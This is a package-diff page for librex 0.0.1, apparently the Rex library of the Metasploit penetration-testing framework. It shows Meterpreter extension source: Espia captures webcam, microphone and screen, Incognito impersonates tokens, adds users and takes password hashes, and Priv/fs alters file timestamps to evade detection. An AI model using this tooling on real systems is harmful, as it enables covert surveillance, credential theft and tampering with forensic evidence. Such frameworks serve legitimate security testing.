RubyGems - librex - Versions diffs - 0.0.1 - Mend

librex 0.0.1

Files changed (370) hide show

data/README +4 -0
data/lib/rex.rb +101 -0
data/lib/rex.rb.ts.rb +70 -0
data/lib/rex/LICENSE +29 -0
data/lib/rex/arch.rb +103 -0
data/lib/rex/arch/sparc.rb +75 -0
data/lib/rex/arch/sparc.rb.ut.rb +18 -0
data/lib/rex/arch/x86.rb +513 -0
data/lib/rex/arch/x86.rb.ut.rb +93 -0
data/lib/rex/assembly/nasm.rb +100 -0
data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
data/lib/rex/codepage.map +104 -0
data/lib/rex/compat.rb +281 -0
data/lib/rex/constants.rb +113 -0
data/lib/rex/elfparsey.rb +11 -0
data/lib/rex/elfparsey/elf.rb +123 -0
data/lib/rex/elfparsey/elfbase.rb +260 -0
data/lib/rex/elfparsey/exceptions.rb +27 -0
data/lib/rex/elfscan.rb +12 -0
data/lib/rex/elfscan/scanner.rb +207 -0
data/lib/rex/elfscan/search.rb +46 -0
data/lib/rex/encoder/alpha2.rb +31 -0
data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
data/lib/rex/encoder/alpha2/generic.rb +113 -0
data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
data/lib/rex/encoder/ndr.rb +89 -0
data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
data/lib/rex/encoder/nonalpha.rb +61 -0
data/lib/rex/encoder/nonupper.rb +64 -0
data/lib/rex/encoder/xdr.rb +106 -0
data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
data/lib/rex/encoder/xor.rb +69 -0
data/lib/rex/encoder/xor/dword.rb +13 -0
data/lib/rex/encoder/xor/dword_additive.rb +13 -0
data/lib/rex/encoders/xor_dword.rb +35 -0
data/lib/rex/encoders/xor_dword_additive.rb +53 -0
data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
data/lib/rex/encoding/xor.rb +20 -0
data/lib/rex/encoding/xor.rb.ts.rb +14 -0
data/lib/rex/encoding/xor/byte.rb +15 -0
data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
data/lib/rex/encoding/xor/dword.rb +21 -0
data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/dword_additive.rb +92 -0
data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
data/lib/rex/encoding/xor/exceptions.rb +17 -0
data/lib/rex/encoding/xor/generic.rb +146 -0
data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
data/lib/rex/encoding/xor/qword.rb +15 -0
data/lib/rex/encoding/xor/word.rb +21 -0
data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
data/lib/rex/exceptions.rb +275 -0
data/lib/rex/exceptions.rb.ut.rb +44 -0
data/lib/rex/exploitation/cmdstager.rb +133 -0
data/lib/rex/exploitation/egghunter.rb +143 -0
data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
data/lib/rex/exploitation/encryptjs.rb +77 -0
data/lib/rex/exploitation/heaplib.js.b64 +331 -0
data/lib/rex/exploitation/heaplib.rb +94 -0
data/lib/rex/exploitation/javascriptosdetect.rb +735 -0
data/lib/rex/exploitation/obfuscatejs.rb +335 -0
data/lib/rex/exploitation/opcodedb.rb +818 -0
data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
data/lib/rex/exploitation/seh.rb +92 -0
data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
data/lib/rex/file.rb +84 -0
data/lib/rex/file.rb.ut.rb +16 -0
data/lib/rex/image_source.rb +12 -0
data/lib/rex/image_source/disk.rb +60 -0
data/lib/rex/image_source/image_source.rb +46 -0
data/lib/rex/image_source/memory.rb +37 -0
data/lib/rex/io/bidirectional_pipe.rb +157 -0
data/lib/rex/io/datagram_abstraction.rb +35 -0
data/lib/rex/io/stream.rb +313 -0
data/lib/rex/io/stream_abstraction.rb +186 -0
data/lib/rex/io/stream_server.rb +211 -0
data/lib/rex/job_container.rb +202 -0
data/lib/rex/logging.rb +4 -0
data/lib/rex/logging/log_dispatcher.rb +179 -0
data/lib/rex/logging/log_sink.rb +42 -0
data/lib/rex/logging/sinks/flatfile.rb +55 -0
data/lib/rex/logging/sinks/stderr.rb +43 -0
data/lib/rex/machparsey.rb +9 -0
data/lib/rex/machparsey/exceptions.rb +34 -0
data/lib/rex/machparsey/mach.rb +209 -0
data/lib/rex/machparsey/machbase.rb +408 -0
data/lib/rex/machscan.rb +9 -0
data/lib/rex/machscan/scanner.rb +217 -0
data/lib/rex/mime.rb +9 -0
data/lib/rex/mime/header.rb +75 -0
data/lib/rex/mime/message.rb +112 -0
data/lib/rex/mime/part.rb +20 -0
data/lib/rex/nop/opty2.rb +108 -0
data/lib/rex/nop/opty2.rb.ut.rb +23 -0
data/lib/rex/nop/opty2_tables.rb +300 -0
data/lib/rex/ole.rb +128 -0
data/lib/rex/ole/clsid.rb +47 -0
data/lib/rex/ole/difat.rb +141 -0
data/lib/rex/ole/directory.rb +230 -0
data/lib/rex/ole/direntry.rb +240 -0
data/lib/rex/ole/fat.rb +99 -0
data/lib/rex/ole/header.rb +204 -0
data/lib/rex/ole/minifat.rb +77 -0
data/lib/rex/ole/samples/create_ole.rb +27 -0
data/lib/rex/ole/samples/dir.rb +35 -0
data/lib/rex/ole/samples/dump_stream.rb +34 -0
data/lib/rex/ole/samples/ole_info.rb +23 -0
data/lib/rex/ole/storage.rb +395 -0
data/lib/rex/ole/stream.rb +53 -0
data/lib/rex/ole/substorage.rb +49 -0
data/lib/rex/ole/util.rb +157 -0
data/lib/rex/parser/arguments.rb +97 -0
data/lib/rex/parser/arguments.rb.ut.rb +67 -0
data/lib/rex/parser/ini.rb +185 -0
data/lib/rex/parser/ini.rb.ut.rb +29 -0
data/lib/rex/parser/nmap_xml.rb +111 -0
data/lib/rex/payloads.rb +1 -0
data/lib/rex/payloads/win32.rb +2 -0
data/lib/rex/payloads/win32/common.rb +26 -0
data/lib/rex/payloads/win32/kernel.rb +53 -0
data/lib/rex/payloads/win32/kernel/common.rb +54 -0
data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
data/lib/rex/payloads/win32/kernel/stager.rb +171 -0
data/lib/rex/peparsey.rb +12 -0
data/lib/rex/peparsey/exceptions.rb +32 -0
data/lib/rex/peparsey/pe.rb +188 -0
data/lib/rex/peparsey/pe_memdump.rb +63 -0
data/lib/rex/peparsey/pebase.rb +1655 -0
data/lib/rex/peparsey/section.rb +136 -0
data/lib/rex/pescan.rb +13 -0
data/lib/rex/pescan/analyze.rb +309 -0
data/lib/rex/pescan/scanner.rb +206 -0
data/lib/rex/pescan/search.rb +56 -0
data/lib/rex/platforms.rb +1 -0
data/lib/rex/platforms/windows.rb +51 -0
data/lib/rex/poly.rb +132 -0
data/lib/rex/poly/block.rb +468 -0
data/lib/rex/poly/register.rb +100 -0
data/lib/rex/poly/register/x86.rb +40 -0
data/lib/rex/post.rb +8 -0
data/lib/rex/post/dir.rb +51 -0
data/lib/rex/post/file.rb +172 -0
data/lib/rex/post/file_stat.rb +220 -0
data/lib/rex/post/gen.pl +13 -0
data/lib/rex/post/io.rb +182 -0
data/lib/rex/post/meterpreter.rb +4 -0
data/lib/rex/post/meterpreter/channel.rb +438 -0
data/lib/rex/post/meterpreter/channel_container.rb +54 -0
data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
data/lib/rex/post/meterpreter/client.rb +335 -0
data/lib/rex/post/meterpreter/client_core.rb +274 -0
data/lib/rex/post/meterpreter/dependencies.rb +3 -0
data/lib/rex/post/meterpreter/extension.rb +32 -0
data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
data/lib/rex/post/meterpreter/extensions/priv/priv.rb +104 -0
data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +100 -0
data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +24 -0
data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +273 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +235 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +192 -0
data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +139 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +184 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +361 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +182 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +174 -0
data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +185 -0
data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
data/lib/rex/post/meterpreter/packet.rb +596 -0
data/lib/rex/post/meterpreter/packet_dispatcher.rb +409 -0
data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
data/lib/rex/post/meterpreter/ui/console.rb +135 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +595 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +63 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +376 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +270 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +484 -0
data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
data/lib/rex/post/permission.rb +26 -0
data/lib/rex/post/process.rb +57 -0
data/lib/rex/post/thread.rb +57 -0
data/lib/rex/post/ui.rb +52 -0
data/lib/rex/proto.rb +12 -0
data/lib/rex/proto.rb.ts.rb +8 -0
data/lib/rex/proto/dcerpc.rb +6 -0
data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
data/lib/rex/proto/dcerpc/client.rb +358 -0
data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
data/lib/rex/proto/dcerpc/handle.rb +47 -0
data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
data/lib/rex/proto/dcerpc/ndr.rb +72 -0
data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
data/lib/rex/proto/dcerpc/packet.rb +253 -0
data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
data/lib/rex/proto/dcerpc/response.rb +186 -0
data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
data/lib/rex/proto/dcerpc/uuid.rb +84 -0
data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
data/lib/rex/proto/drda.rb +5 -0
data/lib/rex/proto/drda.rb.ts.rb +17 -0
data/lib/rex/proto/drda/constants.rb +49 -0
data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
data/lib/rex/proto/drda/packet.rb +252 -0
data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
data/lib/rex/proto/drda/utils.rb +123 -0
data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
data/lib/rex/proto/http.rb +5 -0
data/lib/rex/proto/http.rb.ts.rb +12 -0
data/lib/rex/proto/http/client.rb +817 -0
data/lib/rex/proto/http/client.rb.ut.rb +93 -0
data/lib/rex/proto/http/handler.rb +46 -0
data/lib/rex/proto/http/handler/erb.rb +128 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
data/lib/rex/proto/http/handler/proc.rb +54 -0
data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
data/lib/rex/proto/http/header.rb +161 -0
data/lib/rex/proto/http/header.rb.ut.rb +46 -0
data/lib/rex/proto/http/packet.rb +394 -0
data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
data/lib/rex/proto/http/request.rb +356 -0
data/lib/rex/proto/http/request.rb.ut.rb +214 -0
data/lib/rex/proto/http/response.rb +85 -0
data/lib/rex/proto/http/response.rb.ut.rb +149 -0
data/lib/rex/proto/http/server.rb +367 -0
data/lib/rex/proto/http/server.rb.ut.rb +79 -0
data/lib/rex/proto/smb.rb +7 -0
data/lib/rex/proto/smb.rb.ts.rb +8 -0
data/lib/rex/proto/smb/client.rb +1733 -0
data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
data/lib/rex/proto/smb/constants.rb +1062 -0
data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
data/lib/rex/proto/smb/crypt.rb +95 -0
data/lib/rex/proto/smb/crypt.rb.ut.rb +20 -0
data/lib/rex/proto/smb/evasions.rb +65 -0
data/lib/rex/proto/smb/exceptions.rb +846 -0
data/lib/rex/proto/smb/simpleclient.rb +292 -0
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
data/lib/rex/proto/smb/utils.rb +514 -0
data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
data/lib/rex/proto/sunrpc.rb +1 -0
data/lib/rex/proto/sunrpc/client.rb +195 -0
data/lib/rex/script.rb +42 -0
data/lib/rex/script/base.rb +59 -0
data/lib/rex/script/meterpreter.rb +9 -0
data/lib/rex/script/shell.rb +9 -0
data/lib/rex/service.rb +48 -0
data/lib/rex/service_manager.rb +141 -0
data/lib/rex/service_manager.rb.ut.rb +32 -0
data/lib/rex/services/local_relay.rb +423 -0
data/lib/rex/socket.rb +586 -0
data/lib/rex/socket.rb.ut.rb +86 -0
data/lib/rex/socket/comm.rb +119 -0
data/lib/rex/socket/comm/local.rb +409 -0
data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
data/lib/rex/socket/ip.rb +129 -0
data/lib/rex/socket/parameters.rb +345 -0
data/lib/rex/socket/parameters.rb.ut.rb +51 -0
data/lib/rex/socket/range_walker.rb +295 -0
data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
data/lib/rex/socket/ssl_tcp.rb +184 -0
data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
data/lib/rex/socket/ssl_tcp_server.rb +122 -0
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +51 -0
data/lib/rex/socket/subnet_walker.rb +75 -0
data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
data/lib/rex/socket/switch_board.rb +272 -0
data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
data/lib/rex/socket/tcp.rb +76 -0
data/lib/rex/socket/tcp.rb.ut.rb +64 -0
data/lib/rex/socket/tcp_server.rb +67 -0
data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
data/lib/rex/socket/udp.rb +157 -0
data/lib/rex/socket/udp.rb.ut.rb +44 -0
data/lib/rex/struct2.rb +5 -0
data/lib/rex/struct2/c_struct.rb +181 -0
data/lib/rex/struct2/c_struct_template.rb +39 -0
data/lib/rex/struct2/constant.rb +26 -0
data/lib/rex/struct2/element.rb +44 -0
data/lib/rex/struct2/generic.rb +73 -0
data/lib/rex/struct2/restraint.rb +54 -0
data/lib/rex/struct2/s_string.rb +72 -0
data/lib/rex/struct2/s_struct.rb +111 -0
data/lib/rex/sync.rb +6 -0
data/lib/rex/sync/event.rb +94 -0
data/lib/rex/sync/read_write_lock.rb +176 -0
data/lib/rex/sync/ref.rb +57 -0
data/lib/rex/sync/thread_safe.rb +82 -0
data/lib/rex/test.rb +35 -0
data/lib/rex/text.rb +1029 -0
data/lib/rex/text.rb.ut.rb +168 -0
data/lib/rex/time.rb +65 -0
data/lib/rex/transformer.rb +115 -0
data/lib/rex/transformer.rb.ut.rb +38 -0
data/lib/rex/ui.rb +21 -0
data/lib/rex/ui/interactive.rb +252 -0
data/lib/rex/ui/output.rb +80 -0
data/lib/rex/ui/output/none.rb +18 -0
data/lib/rex/ui/progress_tracker.rb +96 -0
data/lib/rex/ui/subscriber.rb +149 -0
data/lib/rex/ui/text/color.rb +97 -0
data/lib/rex/ui/text/color.rb.ut.rb +18 -0
data/lib/rex/ui/text/dispatcher_shell.rb +382 -0
data/lib/rex/ui/text/input.rb +117 -0
data/lib/rex/ui/text/input/buffer.rb +75 -0
data/lib/rex/ui/text/input/readline.rb +129 -0
data/lib/rex/ui/text/input/socket.rb +95 -0
data/lib/rex/ui/text/input/stdio.rb +45 -0
data/lib/rex/ui/text/irb_shell.rb +55 -0
data/lib/rex/ui/text/output.rb +80 -0
data/lib/rex/ui/text/output/buffer.rb +65 -0
data/lib/rex/ui/text/output/file.rb +37 -0
data/lib/rex/ui/text/output/socket.rb +43 -0
data/lib/rex/ui/text/output/stdio.rb +40 -0
data/lib/rex/ui/text/progress_tracker.rb +56 -0
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
data/lib/rex/ui/text/shell.rb +321 -0
data/lib/rex/ui/text/table.rb +254 -0
data/lib/rex/ui/text/table.rb.ut.rb +55 -0
data/lib/rex/zip.rb +93 -0
data/lib/rex/zip/archive.rb +91 -0
data/lib/rex/zip/blocks.rb +182 -0
data/lib/rex/zip/entry.rb +95 -0
data/lib/rex/zip/samples/comment.rb +32 -0
data/lib/rex/zip/samples/mkwar.rb +138 -0
data/lib/rex/zip/samples/mkzip.rb +19 -0
data/lib/rex/zip/samples/recursive.rb +58 -0
metadata +435 -0

data/lib/rex/post/meterpreter/dependencies.rb ADDED

@@ -0,0 +1,3 @@
+#!/usr/bin/env ruby
+require 'rex/post/permission'

data/lib/rex/post/meterpreter/extension.rb ADDED

@@ -0,0 +1,32 @@
+#!/usr/bin/env ruby
+module Rex
+module Post
+module Meterpreter
+###
+#
+# Base class for all extensions that holds a reference to the
+# client context that they are part of.  Each extension also has a defined
+# name through which it is referenced.
+#
+###
+class Extension
+	#
+	# Initializes the client and name attributes.
+	#
+	def initialize(client, name)
+		self.client = client
+		self.name   = name
+	end
+	#
+	# The name of the extension.
+	#
+	attr_accessor :name
+protected
+	attr_accessor :client # :nodoc:
+end
+end; end; end

data/lib/rex/post/meterpreter/extensions/espia/espia.rb ADDED

@@ -0,0 +1,58 @@
+#!/usr/bin/env ruby
+require 'rex/post/meterpreter/extensions/espia/tlv'
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Espia
+###
+#
+# This meterpreter extensions interface that is capable
+# grab webcam frame and recor mic audio
+#
+###
+class Espia < Extension
+	def initialize(client)
+		super(client, 'espia')
+		client.register_extension_aliases(
+			[
+				{
+					'name' => 'espia',
+					'ext'  => self
+				},
+			])
+	end
+	def espia_video_get_dev_image()
+		request = Packet.create_request('espia_video_get_dev_image')
+		response = client.send_request(request)
+		return true
+	end
+	def espia_audio_get_dev_audio(rsecs)
+		request = Packet.create_request('espia_audio_get_dev_audio')
+		request.add_tlv(TLV_TYPE_DEV_RECTIME, rsecs)
+		response = client.send_request(request)
+		return true
+	end
+	def espia_image_get_dev_screen
+		request  = Packet.create_request( 'espia_image_get_dev_screen' )
+		response = client.send_request( request )
+		if( response.result == 0 )
+			return response.get_tlv_value( TLV_TYPE_DEV_SCREEN )
+		end
+		return nil
+	end
+end
+end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/espia/tlv.rb ADDED

@@ -0,0 +1,16 @@
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Espia
+TLV_TYPE_DEV_IMAGE = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 911)
+TLV_TYPE_DEV_AUDIO = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 912)
+TLV_TYPE_DEV_SCREEN = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 913)
+TLV_TYPE_DEV_RECTIME = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 914)
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb ADDED

@@ -0,0 +1,94 @@
+#!/usr/bin/env ruby
+require 'rex/post/meterpreter/extensions/incognito/tlv'
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Incognito
+###
+#
+# This meterpreter extensions a privilege escalation interface that is capable
+# of doing things like dumping password hashes and performing local
+# exploitation.
+#
+###
+class Incognito < Extension
+	def initialize(client)
+		super(client, 'incognito')
+		client.register_extension_aliases(
+			[
+				{
+					'name' => 'incognito',
+					'ext'  => self
+				},
+			])
+	end
+	def incognito_list_tokens(token_order)
+		request = Packet.create_request('incognito_list_tokens')
+		request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order)
+		response = client.send_request(request)
+		return {
+			'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION),
+			'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION)
+		}
+	end
+	def incognito_impersonate_token(username)
+		request = Packet.create_request('incognito_impersonate_token')
+		request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username)
+		response = client.send_request(request)
+		response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
+	end
+	def incognito_add_user(host, username, password)
+		request = Packet.create_request('incognito_add_user')
+		request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
+		request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password)
+		request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
+		response = client.send_request(request)
+		response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
+	end
+	def incognito_add_group_user(host, groupname, username)
+		request = Packet.create_request('incognito_add_group_user')
+		request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
+		request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
+		request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
+		response = client.send_request(request)
+		response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
+	end
+	def incognito_add_localgroup_user(host, groupname, username)
+		request = Packet.create_request('incognito_add_localgroup_user')
+		request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username)
+		request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname)
+		request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
+		response = client.send_request(request)
+		response.get_tlv_value(TLV_TYPE_INCOGNITO_GENERIC_RESPONSE)
+	end
+	def incognito_snarf_hashes(host)
+		request = Packet.create_request('incognito_snarf_hashes')
+		request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host)
+		response = client.send_request(request)
+		return true
+	end
+end
+end; end; end; end; end

data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb ADDED

@@ -0,0 +1,21 @@
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Incognito
+TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION        	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
+TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION        	= TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
+TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER       	= TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 4)
+TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
+TLV_TYPE_INCOGNITO_GENERIC_RESPONSE    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 6)
+TLV_TYPE_INCOGNITO_USERNAME    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 7)
+TLV_TYPE_INCOGNITO_PASSWORD    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8)
+TLV_TYPE_INCOGNITO_SERVERNAME    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9)
+TLV_TYPE_INCOGNITO_GROUPNAME    = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10)
+end
+end
+end
+end
+end

data/lib/rex/post/meterpreter/extensions/priv/fs.rb ADDED

@@ -0,0 +1,118 @@
+#!/usr/bin/env ruby
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Priv
+###
+#
+# This class provides an interface to modifying the file system to avoid
+# detection, such as by modifying extended file system attributes.
+#
+###
+class Fs
+	#
+	# Initializes the file system subsystem of the privilege escalation
+	# extension.
+	#
+	def initialize(client)
+		self.client = client
+	end
+	#
+	# Returns a hash of the Modified, Accessed, Created, and Entry Modified
+	# values for the specified file path.
+	#
+	def get_file_mace(file_path)
+		request = Packet.create_request('priv_fs_get_file_mace')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
+		response = client.send_request(request)
+		# Return the hash of times associated with the MACE values
+		begin
+			return {
+				'Modified'       => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_MODIFIED)),
+				'Accessed'       => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_ACCESSED)),
+				'Created'        => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_CREATED)),
+				'Entry Modified' => Time.at(response.get_tlv_value(TLV_TYPE_FS_FILE_EMODIFIED))
+			}
+		rescue RangeError
+			raise RangeError, "Invalid MACE values"
+		end
+	end
+	#
+	# Sets the Modified, Accessed, Created, and Entry Modified attributes of
+	# the specified file path.  If a nil is supplied for a value, it will not
+	# be modified.  Otherwise, the times should be instances of the Time class.
+	#
+	def set_file_mace(file_path, modified = nil, accessed = nil, created = nil,
+		entry_modified = nil)
+		request = Packet.create_request('priv_fs_set_file_mace')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
+		request.add_tlv(TLV_TYPE_FS_FILE_MODIFIED, modified.to_i) if (modified)
+		request.add_tlv(TLV_TYPE_FS_FILE_ACCESSED, accessed.to_i) if (accessed)
+		request.add_tlv(TLV_TYPE_FS_FILE_CREATED, created.to_i) if (created)
+		request.add_tlv(TLV_TYPE_FS_FILE_EMODIFIED, entry_modified.to_i) if (entry_modified)
+		client.send_request(request)
+		true
+	end
+	#
+	# Sets the MACE attributes of the specified target_file_path to the MACE
+	# attributes of the source_file_path.
+	#
+	def set_file_mace_from_file(target_file_path, source_file_path)
+		request = Packet.create_request('priv_fs_set_file_mace_from_file')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, target_file_path)
+		request.add_tlv(TLV_TYPE_FS_SRC_FILE_PATH, source_file_path)
+		client.send_request(request)
+		true
+	end
+	#
+	# Sets the MACE values to the minimum threshold that will cause them to not
+	# be displayed by most all products for a file.
+	#
+	def blank_file_mace(file_path)
+		request = Packet.create_request('priv_fs_blank_file_mace')
+		request.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)
+		client.send_request(request)
+		true
+	end
+	#
